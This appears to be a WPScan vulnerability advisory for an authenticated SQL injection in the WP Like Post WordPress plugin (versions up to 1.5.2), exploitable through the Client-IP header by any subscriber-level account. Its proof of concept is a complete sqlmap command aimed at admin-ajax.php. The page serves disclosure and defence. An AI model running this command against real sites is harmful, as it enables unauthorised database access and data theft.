WP Like Post <= 1.5.2 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
It's possible to inject SQL via several points (Client-IP Header for example) when using the [gs_lp_like_post] shortcode. A low-privileged account is necessary for this; subscriber is enough.

Found by: Paul Dannewitz

Other vulnerabilities submitted to wpvulndb: https://wpvulndb.com/search?utf8=%E2%9C%93&text=Paul+Dannewitz
Proof of Concept
./sqlmap.py -u "http://wordpress.app/wp-admin/admin-ajax.php" --cookie="[insert cookie of a wordpress account, even if it's just a subscriber]" --data="action=parse-media-shortcode&shortcode=[gs_lp_like_post post_id=\"1\"]" -H "Client-IP: 127.0.0.1*" --level 5 --dbms=mysql

Affects Plugin

References

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Paul Dannewitz
Submitter Twitter padannewitz
Views 10
Verified No
WPVDB ID 8903

Timeline

Publicly Published 2017-08-25 (2 months ago)
Added 2017-09-20 (about 1 month ago)
Last Updated 2017-09-20 (about 1 month ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.